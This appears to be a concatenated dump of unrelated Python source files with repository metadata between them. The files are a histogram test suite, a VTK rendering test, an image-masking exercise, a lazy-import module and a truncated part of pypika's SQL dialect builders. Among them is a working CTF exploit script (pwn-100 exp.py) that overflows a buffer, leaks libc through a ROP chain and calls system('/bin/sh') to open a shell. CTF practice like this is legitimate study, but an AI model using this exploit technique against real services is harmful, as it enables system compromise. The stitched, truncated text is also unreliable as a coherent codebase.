wbin9 = numpy.sum(nnweights * numpy.logical_and(nn, numpy.logical_and(0.9 < xdata, xdata <= 1.0)))
wover = numpy.sum(nnweights * numpy.logical_and(nn, (xdata > 1.0)))
wnan = numpy.sum(nnweights * numpy.isnan(xdata))
w2under = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata <= 0.0)))
w2bin0 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.0 < xdata, xdata <= 0.1)))
w2bin1 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.1 < xdata, xdata <= 0.2)))
w2bin2 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.2 < xdata, xdata <= 0.3)))
w2bin3 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.3 < xdata, xdata <= 0.4)))
w2bin4 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.4 < xdata, xdata <= 0.5)))
w2bin5 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.5 < xdata, xdata <= 0.6)))
w2bin6 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.6 < xdata, xdata <= 0.7)))
w2bin7 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.7 < xdata, xdata <= 0.8)))
w2bin8 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.8 < xdata, xdata <= 0.9)))
w2bin9 = numpy.sum(nnweights2 * numpy.logical_and(nn, numpy.logical_and(0.9 < xdata, xdata <= 1.0)))
w2over = numpy.sum(nnweights2 * numpy.logical_and(nn, (xdata > 1.0)))
w2nan = numpy.sum(nnweights2 * numpy.isnan(xdata))
for underflow in False, True:
for overflow in False, True:
for nanflow in False, True:
compare = [bin0, bin1, bin2, bin3, bin4, bin5, bin6, bin7, bin8, bin9]
if underflow:
compare.insert(0, under)
if overflow:
compare.append(over)
if nanflow:
compare.append(nan)
h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow, closedlow=False))
h.fill(x=xdata)
self.assertEqual(h._content.reshape(-1).tolist(), compare)
compare = [[wbin0, w2bin0], [wbin1, w2bin1], [wbin2, w2bin2], [wbin3, w2bin3], [wbin4, w2bin4], [wbin5, w2bin5], [wbin6, w2bin6], [wbin7, w2bin7], [wbin8, w2bin8], [wbin9, w2bin9]]
if underflow:
compare.insert(0, [wunder, w2under])
if overflow:
compare.append([wover, w2over])
if nanflow:
compare.append([wnan, w2nan])
h = Hist(bin("x", 10, 0, 1, underflow=underflow, overflow=overflow, nanflow=nanflow, closedlow=False)).weight("w")
h.fill(x=xdata, w=weights)
self.assertTrue(numpy.absolute((h._content - numpy.array(compare)).reshape(-1)).max() < 1e-10)
def test_intbin(self):
h = Hist(intbin("x", 0, 10, underflow=True, overflow=True))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[5], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [4]])
h = Hist(intbin("x", 0, 10, underflow=True, overflow=False))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[5], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1]])
h = Hist(intbin("x", 0, 10, underflow=False, overflow=True))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [4]])
h = Hist(intbin("x", 0, 10, underflow=False, overflow=False))
h.fill(x=range(-5, 15))
self.assertEqual(h._content.tolist(), [[1], [1], [1], [1], [1], [1], [1], [1], [1], [1], [1]])
def test_split(self):
h = Hist(split("x", 3))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [4], [0]])
h = Hist(split("x", 3))
h.fill(x=[0, 1, 2, 3, 4, 5, numpy.nan])
self.assertEqual(h._content.tolist(), [[3], [3], [1]])
h = Hist(split("x", (2.5, 3.5)))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [1], [3], [0]])
h = Hist(split("x", (2.5, 3.5, 5.0)))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [1], [1], [2], [0]])
h = Hist(split("x", (2.5, 3.5, 5.0), closedlow=False))
h.fill(x=[0, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), [[3], [1], [2], [1], [0]])
under = [[2]]
over = [[4]]
nan = [[1]]
for underflow in (False, True):
for overflow in (False, True):
for nanflow in (False, True):
if underflow or overflow or nanflow:
h = Hist(split("x", 3, underflow=underflow, overflow=overflow, nanflow=nanflow))
h.fill(x=[numpy.nan, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), (under if underflow else []) + (over if overflow else []) + (nan if nanflow else []))
under = [[2]]
over = [[1]]
nan = [[1]]
for underflow in (False, True):
for overflow in (False, True):
for nanflow in (False, True):
h = Hist(split("x", (2.5, 3.5, 5.0), underflow=underflow, overflow=overflow, nanflow=nanflow, closedlow=False))
h.fill(x=[numpy.nan, 1, 2, 3, 4, 5, 6])
self.assertEqual(h._content.tolist(), (under if underflow else []) + [[1], [2]] + (over if overflow else []) + (nan if nanflow else []))
def test_cut(self):
h = Hist(cut("p"))
h.fill(p=[False, True, True])
self.assertEqual(h._content.tolist(), [[1], [2]])
h = Hist(cut("x > 3"))
h.fill(x=[1, 2, 3, 4, 5])
self.assertEqual(h._content.tolist(), [[3], [2]])
h = Hist(cut("x > 3 and p"))
h.fill(x=[1, 2, 3, 4, 5], p=[True, False, True, False, True])
self.assertEqual(h._content.tolist(), [[4], [1]])
h = Hist(cut("x > 3 and y % 2 == 0"))
h.fill(x=[1, 2, 3, 4, 5], y=[0, 1, 2, 3, 4])
self.assertEqual(h._content.tolist(), [[4], [1]])
h = Hist(cut("x > 3 and y % 2 == 0"), split("x", 3.5))
h.fill(x=[1, 2, 3, 4, 5], y=[0, 1, 2, 3, 4])
self.assertEqual(h._content.tolist(), [[[3], [1], [0]], [[0], [1], [0]]])
def test_profile(self):
h = Hist(bin("x", 10, 10, 11), profile("y"))
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.2, 0.020000000000000004, 2.0], [0.2, 0.020000000000000004, 2.0], [0.1, 0.010000000000000002, 1.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [1.0, 1.0, 1.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
h = Hist(bin("x", 10, 10, 11), profile("y"), profile("2*y"))
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
self.assertEqual(h._content.tolist(), [[0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.2, 0.020000000000000004, 0.4, 0.08000000000000002, 2.0], [0.2, 0.020000000000000004, 0.4, 0.08000000000000002, 2.0], [0.1, 0.010000000000000002, 0.2, 0.04000000000000001, 1.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [1.0, 1.0, 2.0, 4.0, 1.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0]])
def test_groupby(self):
h = Hist(groupby("c"), bin("x", 3, 1.0, 4.0, underflow=False, overflow=False, nanflow=False))
h.fill(c=["one", "two", "three", "two", "one", "one", "one"], x=[1, 2, 3, 2, 1, 1, 3])
self.assertEqual(h._content["one"].tolist(), [[3], [0], [1]])
self.assertEqual(h._content["two"].tolist(), [[0], [2], [0]])
self.assertEqual(h._content["three"].tolist(), [[0], [0], [1]])
def test_groupby_groupby(self):
h = Hist(groupby("c1"), groupby("c2"), bin("x", 1, 1.0, 2.0, underflow=False, overflow=False, nanflow=False))
h.fill(c1=["one", "two", "one", "two"], c2=["uno", "uno", "dos", "dos"], x=[1, 1, 1, 1])
self.assertEqual(h._content["one"]["uno"].tolist(), [[1]])
self.assertEqual(h._content["two"]["uno"].tolist(), [[1]])
self.assertEqual(h._content["one"]["dos"].tolist(), [[1]])
self.assertEqual(h._content["two"]["dos"].tolist(), [[1]])
def test_groupbin(self):
h = Hist(groupbin("x", 10.0), bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False))
h.fill(x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content[0.0].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content[10.0].tolist(), [[0], [1], [1], [0]])
self.assertEqual(h._content[20.0].tolist(), [[0], [0], [0], [1]])
h = Hist(groupbin("x", 10.0, origin=1.0), bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False))
h.fill(x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content[-9.0].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content[1.0].tolist(), [[0], [1], [0], [0]])
self.assertEqual(h._content[11.0].tolist(), [[0], [0], [1], [1]])
def test_groupby_groupbin(self):
h = Hist(bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False), groupby("c"), groupbin("x", 10.0))
h.fill(c=["one", "one", "two", "two"], x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content["one"][0.0].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content["one"][10.0].tolist(), [[0], [1], [0], [0]])
self.assertEqual(h._content["two"][10.0].tolist(), [[0], [0], [1], [0]])
self.assertEqual(h._content["two"][20.0].tolist(), [[0], [0], [0], [1]])
h = Hist(groupbin("x", 10.0), bin("y", 4, 1.0, 5.0, underflow=False, overflow=False, nanflow=False), groupby("c"))
h.fill(c=["one", "one", "two", "two"], x=[0, 10, 15, 20], y=[1, 2, 3, 4])
self.assertEqual(h._content[0.0]["one"].tolist(), [[1], [0], [0], [0]])
self.assertEqual(h._content[10.0]["one"].tolist(), [[0], [1], [0], [0]])
self.assertEqual(h._content[10.0]["two"].tolist(), [[0], [0], [1], [0]])
self.assertEqual(h._content[20.0]["two"].tolist(), [[0], [0], [0], [1]])
def test_pickle(self):
h = Hist(split("x", (1, 2, 3)), bin("y", 10, 0, 1), defs={"y": "x + 0.1"}, weight="sqrt(x)", filter="x > 2")
self.assertEqual(h, pickle.loads(pickle.dumps(h)))
h.fill(x=[1, 2, 3])
self.assertEqual(h, pickle.loads(pickle.dumps(h)))
def test_json(self):
h = Hist(split("x", (1, 2, 3)), bin("y", 10, 0, 1), defs={"y": "x + 0.1"}, weight="sqrt(x)", filter="x > 2")
self.assertEqual(h, Hist.fromjson(h.tojson()))
h.fill(x=[1, 2, 3])
self.assertEqual(h, Hist.fromjson(h.tojson()))
| 62.5898
| 497
| 0.537516
|
4a18abc567d61bc8887e015eb4736647c6efd6cb
| 869
|
py
|
Python
|
xctf/pwn/pwn-100/exp.py
|
haysengithub/ctf
|
c2cefed8470f40d0cb6bc4d1ae941a70936ea497
|
[
"MIT"
] | null | null | null |
xctf/pwn/pwn-100/exp.py
|
haysengithub/ctf
|
c2cefed8470f40d0cb6bc4d1ae941a70936ea497
|
[
"MIT"
] | null | null | null |
xctf/pwn/pwn-100/exp.py
|
haysengithub/ctf
|
c2cefed8470f40d0cb6bc4d1ae941a70936ea497
|
[
"MIT"
] | null | null | null |
from pwn import *
context(arch="amd64",os="linux",log_level="debug",terminal=["tmux","splitw","-h"])
p =process("./pwn")
#gdb.attach(p,"b *0x4006b8")
elf = ELF("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
pop_rdi_ret = 0x0000000000400763
elf_got =elf.got["puts"]
elf_plt = elf.plt["puts"]
main_addr = 0x4006b8#elf.symbols["main"]
payload="A"*(0x40+8)+p64(pop_rdi_ret)+p64(elf_got)+p64(elf_plt)+p64(main_addr)
payload=payload.ljust(200,"A")
p.sendline(payload)
xx =p.recvuntil('\x7f\x0a')[5:-1]+'\x00\x00'
puts_leak=u64(xx)
print(hex(puts_leak))
libc.address=puts_leak-libc.symbols["puts"]
system_addr = libc.symbols["system"]
bin_sh_addr = libc.search("/bin/sh").next()
print(hex(system_addr),hex(bin_sh_addr))
payload="A"*(0x40+7)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr)
payload=payload.ljust(200,"A")
p.sendline(payload)
p.interactive()
| 28.966667
| 82
| 0.715765
|
4a18ace592b97e1a77daa10530157bfab282ca69
| 2,061
|
py
|
Python
|
IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/TestRibbonAndTube.py
|
timkrentz/SunTracker
|
9a189cc38f45e5fbc4e4c700d7295a871d022795
|
[
"MIT"
] | 4
|
2016-03-30T14:31:52.000Z
|
2019-02-02T05:01:32.000Z
|
IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/TestRibbonAndTube.py
|
timkrentz/SunTracker
|
9a189cc38f45e5fbc4e4c700d7295a871d022795
|
[
"MIT"
] | null | null | null |
IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/TestRibbonAndTube.py
|
timkrentz/SunTracker
|
9a189cc38f45e5fbc4e4c700d7295a871d022795
|
[
"MIT"
] | 2
|
2019-08-30T23:36:13.000Z
|
2019-11-08T16:52:01.000Z
|
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# create pipeline
#
reader = vtk.vtkPolyDataReader()
reader.SetFileName("" + str(VTK_DATA_ROOT) + "/Data/vtk.vtk")
# Read a ruler texture
r = vtk.vtkPNGReader()
r.SetFileName("" + str(VTK_DATA_ROOT) + "/Data/ruler.png")
atext = vtk.vtkTexture()
atext.SetInputConnection(r.GetOutputPort())
atext.InterpolateOn()
# produce some ribbons
ribbon = vtk.vtkRibbonFilter()
ribbon.SetInputConnection(reader.GetOutputPort())
ribbon.SetWidth(0.1)
ribbon.SetGenerateTCoordsToUseLength()
ribbon.SetTextureLength(1.0)
ribbon.UseDefaultNormalOn()
ribbon.SetDefaultNormal(0,0,1)
ribbonMapper = vtk.vtkPolyDataMapper()
ribbonMapper.SetInputConnection(ribbon.GetOutputPort())
ribbonActor = vtk.vtkActor()
ribbonActor.SetMapper(ribbonMapper)
ribbonActor.GetProperty().SetColor(1,1,0)
ribbonActor.SetTexture(atext)
# produce some tubes
tuber = vtk.vtkTubeFilter()
tuber.SetInputConnection(reader.GetOutputPort())
tuber.SetRadius(0.1)
tuber.SetNumberOfSides(12)
tuber.SetGenerateTCoordsToUseLength()
tuber.SetTextureLength(0.5)
tuber.CappingOn()
tubeMapper = vtk.vtkPolyDataMapper()
tubeMapper.SetInputConnection(tuber.GetOutputPort())
tubeActor = vtk.vtkActor()
tubeActor.SetMapper(tubeMapper)
tubeActor.GetProperty().SetColor(1,1,0)
tubeActor.SetTexture(atext)
tubeActor.AddPosition(5,0,0)
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(ribbonActor)
ren1.AddActor(tubeActor)
ren1.SetBackground(1,1,1)
renWin.SetSize(900,350)
ren1.SetBackground(1,1,1)
ren1.ResetCamera()
ren1.GetActiveCamera().Zoom(4)
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
threshold = 15
# --- end of script --
| 30.308824
| 66
| 0.769044
|
4a18acea1241dc6956e8b15d931e1692ab9540fe
| 2,355
|
py
|
Python
|
main.py
|
DrEuler/MakeMaskPython
|
608ebfbb5f1e4e1f20197bea56b24e3887ecbe6c
|
[
"MIT"
] | null | null | null |
main.py
|
DrEuler/MakeMaskPython
|
608ebfbb5f1e4e1f20197bea56b24e3887ecbe6c
|
[
"MIT"
] | null | null | null |
main.py
|
DrEuler/MakeMaskPython
|
608ebfbb5f1e4e1f20197bea56b24e3887ecbe6c
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import os.path
import numpy as np # 'as' lets us use standard abbreviations
'''Read the image data'''
# Get the directory of this python script
directory = os.path.dirname(os.path.abspath(__file__))
# Build an absolute filename from directory + filename
filename = os.path.join(directory, 'woman.jpg')
filename2 = os.path.join(directory, 'mask.png')
# Read the image data into an array
img = plt.imread(filename)
img2 = plt.imread(filename2)
'''Show the image data'''
# Create figure with 2 subplot
fig, ax = plt.subplots(1, 2)
# Show the image data in a subplot
ax[0].imshow(img, interpolation='none')
ax[1].imshow(img2, interpolation='none')
# Saves the figure
###
# Make a rectangle of pixels yellow
###
###
# Change a region if condition is True
###
"""
height = len(img)
width = len(img[0])
for r in range(155):
for c in range(width):
if sum(img[r][c])>500: # brightness R+G+B goes up to 3*255=765
img[r][c]=[255,0,255] # R + B = magenta
"""
#for the sky
widthx = len(img[0])
for rx in range(155):
for cx in range(widthx):
if sum(img[rx][cx])>500: # brightness R+G+B goes up to 3*255=765
img[rx][cx]=[255,255,0] # R +g
height = len(img)
width = len(img[0])
for row in range(400, 487):
for column in range(100, 170):
img[row][column] = [255, 0, 0]#green, red
fig.savefig('women2')
print(img)
print(type(img))
print(len(img))
print(len(img[0]))
'''4.Arrays and lists are similar by both doing
the same thing, they are different by arrays
containing a single data type, unlike lists
which contain multiple data types.
'''
"""
5. the image height = the number of rows of pixels = 1000
the image width = the number of columns = 5
the green intensity at (5,9) = 95
the red intensity at (4,10) = 83
the red intensity of the 25th pixel in the 50th row = 104
"""
"""
7.
a. In lines 28-31 of this code the algorithm used is that
the code checks to see how many rows of pixels are in range
of 155. The code than checkks the brightness of the pixels.
Then if the brightness is more than 500, the color will
appear to be sky.
"""
'''
8.
'''
"""CONCLUSION QUESTIONS
1. Digital Images contain data called pixels
2.
3.
"""
| 25.053191
| 72
| 0.669214
|
4a18aceeabbcea68b1ece4aae7f2b828bded4750
| 931
|
py
|
Python
|
sequana/lazy.py
|
cokelaer/sequana
|
da35de12b45f38b4fa488c7a15a6d9829890b44e
|
[
"BSD-3-Clause"
] | null | null | null |
sequana/lazy.py
|
cokelaer/sequana
|
da35de12b45f38b4fa488c7a15a6d9829890b44e
|
[
"BSD-3-Clause"
] | null | null | null |
sequana/lazy.py
|
cokelaer/sequana
|
da35de12b45f38b4fa488c7a15a6d9829890b44e
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016-2017 - Sequana Development Team
#
# File author(s): Sequana Development Team
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
# Source inspiration and lazyimports.py taken from nitime
from sequana.lazyimports import LazyImport
# lazy imports
pylab = LazyImport('pylab')
numpy = LazyImport('numpy')
scipy = LazyImport('scipy')
scipy_stats = LazyImport('scipy.stats')
pandas = LazyImport('pandas')
vcf = LazyImport("vcf")
def enabled():
"Returns ``True`` if LazyImports are globally enabled"
import sequana.lazyimports as l
return not l.disable_lazy_imports
| 28.212121
| 78
| 0.672395
|
4a18ad035a04d802051beee555808a33049844a1
| 21,239
|
py
|
Python
|
pypika/dialects.py
|
foggel/pypika
|
1f6ab34bada982fe632e5828f87bfbac2e601c5f
|
[
"Apache-2.0"
] | null | null | null |
pypika/dialects.py
|
foggel/pypika
|
1f6ab34bada982fe632e5828f87bfbac2e601c5f
|
[
"Apache-2.0"
] | null | null | null |
pypika/dialects.py
|
foggel/pypika
|
1f6ab34bada982fe632e5828f87bfbac2e601c5f
|
[
"Apache-2.0"
] | null | null | null |
from copy import copy
from typing import Any, Union, Optional
from pypika.enums import Dialects
from pypika.queries import (
CreateQueryBuilder,
Query,
QueryBuilder,
Table,
)
from pypika.terms import (
ArithmeticExpression,
EmptyCriterion,
Field,
Function,
Star,
Term,
ValueWrapper,
Criterion,
)
from pypika.utils import (
QueryException,
builder,
)
class SnowFlakeQueryBuilder(QueryBuilder):
QUOTE_CHAR = None
ALIAS_QUOTE_CHAR = '"'
def __init__(self, **kwargs: Any) -> None:
super().__init__(
dialect=Dialects.SNOWFLAKE, **kwargs
)
class SnowflakeQuery(Query):
"""
Defines a query class for use with Snowflake.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> SnowFlakeQueryBuilder:
return SnowFlakeQueryBuilder(**kwargs)
class MySQLQueryBuilder(QueryBuilder):
QUOTE_CHAR = "`"
def __init__(self, **kwargs: Any) -> None:
super().__init__(
dialect=Dialects.MYSQL, wrap_set_operation_queries=False, **kwargs
)
self._duplicate_updates = []
self._ignore_duplicates = False
self._modifiers = []
def __copy__(self) -> "MySQLQueryBuilder":
newone = super().__copy__()
newone._duplicate_updates = copy(self._duplicate_updates)
newone._ignore_duplicates = copy(self._ignore_duplicates)
return newone
@builder
def on_duplicate_key_update(self, field: Union[Field, str], value: Any) -> "MySQLQueryBuilder":
if self._ignore_duplicates:
raise QueryException("Can not have two conflict handlers")
field = Field(field) if not isinstance(field, Field) else field
self._duplicate_updates.append((field, ValueWrapper(value)))
@builder
def on_duplicate_key_ignore(self) -> "MySQLQueryBuilder":
if self._duplicate_updates:
raise QueryException("Can not have two conflict handlers")
self._ignore_duplicates = True
def get_sql(self, **kwargs: Any) -> str:
self._set_kwargs_defaults(kwargs)
querystring = super(MySQLQueryBuilder, self).get_sql(**kwargs)
if querystring:
if self._duplicate_updates:
querystring += self._on_duplicate_key_update_sql(**kwargs)
elif self._ignore_duplicates:
querystring += self._on_duplicate_key_ignore_sql()
return querystring
def _on_duplicate_key_update_sql(self, **kwargs: Any) -> str:
return " ON DUPLICATE KEY UPDATE {updates}".format(
updates=",".join(
"{field}={value}".format(
field=field.get_sql(**kwargs), value=value.get_sql(**kwargs)
)
for field, value in self._duplicate_updates
)
)
def _on_duplicate_key_ignore_sql(self) -> str:
return " ON DUPLICATE KEY IGNORE"
@builder
def modifier(self, value: str) -> "MySQLQueryBuilder":
"""
Adds a modifier such as SQL_CALC_FOUND_ROWS to the query.
https://dev.mysql.com/doc/refman/5.7/en/select.html
:param value: The modifier value e.g. SQL_CALC_FOUND_ROWS
"""
self._modifiers.append(value)
def _select_sql(self, **kwargs: Any) -> str:
"""
Overridden function to generate the SELECT part of the SQL statement,
with the addition of the a modifier if present.
"""
return "SELECT {distinct}{modifier}{select}".format(
distinct="DISTINCT " if self._distinct else "",
modifier="{} ".format(" ".join(self._modifiers)) if self._modifiers else "",
select=",".join(
term.get_sql(with_alias=True, subquery=True, **kwargs)
for term in self._selects
),
)
class MySQLLoadQueryBuilder:
def __init__(self) -> None:
self._load_file = None
self._into_table = None
@builder
def load(self, fp: str) -> "MySQLQueryBuilder":
self._load_file = fp
@builder
def into(self, table: Union[str, Table]) -> "MySQLQueryBuilder":
self._into_table = table if isinstance(table, Table) else Table(table)
def get_sql(self, *args: Any, **kwargs: Any) -> str:
querystring = ""
if self._load_file and self._into_table:
querystring += self._load_file_sql(**kwargs)
querystring += self._into_table_sql(**kwargs)
querystring += self._options_sql(**kwargs)
return querystring
def _load_file_sql(self, **kwargs: Any) -> str:
return "LOAD DATA LOCAL INFILE '{}'".format(self._load_file)
def _into_table_sql(self, **kwargs: Any) -> str:
return " INTO TABLE `{}`".format(self._into_table.get_sql(**kwargs))
def _options_sql(self, **kwargs: Any) -> str:
return " FIELDS TERMINATED BY ','"
def __str__(self) -> str:
return self.get_sql()
class MySQLQuery(Query):
"""
Defines a query class for use with MySQL.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> "MySQLQueryBuilder":
return MySQLQueryBuilder(**kwargs)
@classmethod
def load(cls, fp: str) -> "MySQLQueryBuilder":
return MySQLLoadQueryBuilder().load(fp)
class VerticaQueryBuilder(QueryBuilder):
def __init__(self, **kwargs: Any) -> None:
super().__init__(dialect=Dialects.VERTICA, **kwargs)
self._hint = None
@builder
def hint(self, label: str) -> "VerticaQueryBuilder":
self._hint = label
def get_sql(self, *args: Any, **kwargs: Any) -> str:
sql = super().get_sql(*args, **kwargs)
if self._hint is not None:
sql = "".join(
[sql[:7], "/*+label({hint})*/".format(hint=self._hint), sql[6:]]
)
return sql
class VerticaCreateQueryBuilder(CreateQueryBuilder):
def __init__(self) -> None:
super().__init__(dialect=Dialects.VERTICA)
self._local = False
self._preserve_rows = False
@builder
def local(self) -> "VerticaCreateQueryBuilder":
if not self._temporary:
raise AttributeError("'Query' object has no attribute temporary")
self._local = True
@builder
def preserve_rows(self) -> "VerticaCreateQueryBuilder":
if not self._temporary:
raise AttributeError("'Query' object has no attribute temporary")
self._preserve_rows = True
def _create_table_sql(self, **kwargs: Any) -> str:
return "CREATE {local}{temporary}TABLE {table}".format(
local="LOCAL " if self._local else "",
temporary="TEMPORARY " if self._temporary else "",
table=self._create_table.get_sql(**kwargs),
)
def _columns_sql(self, **kwargs: Any) -> str:
return " ({columns}){preserve_rows}".format(
columns=",".join(column.get_sql(**kwargs) for column in self._columns),
preserve_rows=self._preserve_rows_sql(),
)
def _as_select_sql(self, **kwargs: Any) -> str:
return "{preserve_rows} AS ({query})".format(
preserve_rows=self._preserve_rows_sql(),
query=self._as_select.get_sql(**kwargs),
)
def _preserve_rows_sql(self) -> str:
return " ON COMMIT PRESERVE ROWS" if self._preserve_rows else ""
class VerticaCopyQueryBuilder:
def __init__(self) -> None:
self._copy_table = None
self._from_file = None
@builder
def from_file(self, fp: str) -> "VerticaCopyQueryBuilder":
self._from_file = fp
@builder
def copy_(self, table: Union[str, Table]) -> "VerticaCopyQueryBuilder":
self._copy_table = table if isinstance(table, Table) else Table(table)
def get_sql(self, *args: Any, **kwargs: Any) -> str:
querystring = ""
if self._copy_table and self._from_file:
querystring += self._copy_table_sql(**kwargs)
querystring += self._from_file_sql(**kwargs)
querystring += self._options_sql(**kwargs)
return querystring
def _copy_table_sql(self, **kwargs: Any) -> str:
return 'COPY "{}"'.format(self._copy_table.get_sql(**kwargs))
def _from_file_sql(self, **kwargs: Any) -> str:
return " FROM LOCAL '{}'".format(self._from_file)
def _options_sql(self, **kwargs: Any) -> str:
return " PARSER fcsvparser(header=false)"
def __str__(self) -> str:
return self.get_sql()
class VerticaQuery(Query):
"""
Defines a query class for use with Vertica.
"""
@classmethod
def _builder(cls, **kwargs) -> VerticaQueryBuilder:
return VerticaQueryBuilder(**kwargs)
@classmethod
def from_file(cls, fp: str) -> VerticaCopyQueryBuilder:
return VerticaCopyQueryBuilder().from_file(fp)
@classmethod
def create_table(cls, table: Union[str, Table]) -> VerticaCreateQueryBuilder:
return VerticaCreateQueryBuilder().create_table(table)
class OracleQueryBuilder(QueryBuilder):
def __init__(self, **kwargs: Any) -> None:
super().__init__(dialect=Dialects.ORACLE, **kwargs)
def get_sql(self, *args: Any, **kwargs: Any) -> str:
return super().get_sql(
*args, groupby_alias=False, **kwargs
)
class OracleQuery(Query):
"""
Defines a query class for use with Oracle.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> OracleQueryBuilder:
return OracleQueryBuilder(**kwargs)
class PostgreQueryBuilder(QueryBuilder):
ALIAS_QUOTE_CHAR = '"'
def __init__(self, **kwargs: str) -> None:
super().__init__(dialect=Dialects.POSTGRESQL, **kwargs)
self._returns = []
self._return_star = False
self._on_conflict = False
self._on_conflict_fields = []
self._on_conflict_do_nothing = False
self._on_conflict_do_updates = []
self._on_conflict_wheres = None
self._on_conflict_do_update_wheres = None
self._distinct_on = []
def __copy__(self) -> "PostgreQueryBuilder":
newone = super().__copy__()
newone._returns = copy(self._returns)
newone._on_conflict_do_updates = copy(self._on_conflict_do_updates)
return newone
@builder
def distinct_on(self, *fields: Union[str, Term]) -> "PostgreQueryBuilder":
for field in fields:
if isinstance(field, str):
self._distinct_on.append(Field(field))
elif isinstance(field, Term):
self._distinct_on.append(field)
@builder
def on_conflict(self, *target_fields: Union[str, Term]) -> "PostgreQueryBuilder":
if not self._insert_table:
raise QueryException("On conflict only applies to insert query")
self._on_conflict = True
for target_field in target_fields:
if isinstance(target_field, str):
self._on_conflict_fields.append(self._conflict_field_str(target_field))
elif isinstance(target_field, Term):
self._on_conflict_fields.append(target_field)
@builder
def do_nothing(self) -> "PostgreQueryBuilder":
if len(self._on_conflict_do_updates) > 0:
raise QueryException("Can not have two conflict handlers")
self._on_conflict_do_nothing = True
@builder
def do_update(self, update_field: Union[str, Field], update_value: Any) -> "PostgreQueryBuilder":
if self._on_conflict_do_nothing:
raise QueryException("Can not have two conflict handlers")
if isinstance(update_field, str):
field = self._conflict_field_str(update_field)
elif isinstance(update_field, Field):
field = update_field
else:
raise QueryException("Unsupported update_field")
self._on_conflict_do_updates.append((field, ValueWrapper(update_value)))
@builder
def where(self, criterion: Criterion) -> "PostgreQueryBuilder":
if not self._on_conflict:
return super().where(criterion)
if isinstance(criterion, EmptyCriterion):
return
if self._on_conflict_do_nothing:
raise QueryException('DO NOTHING doest not support WHERE')
if self._on_conflict_fields and self._on_conflict_do_updates:
if self._on_conflict_do_update_wheres:
self._on_conflict_do_update_wheres &= criterion
else:
self._on_conflict_do_update_wheres = criterion
elif self._on_conflict_fields:
if self._on_conflict_wheres:
self._on_conflict_wheres &= criterion
else:
self._on_conflict_wheres = criterion
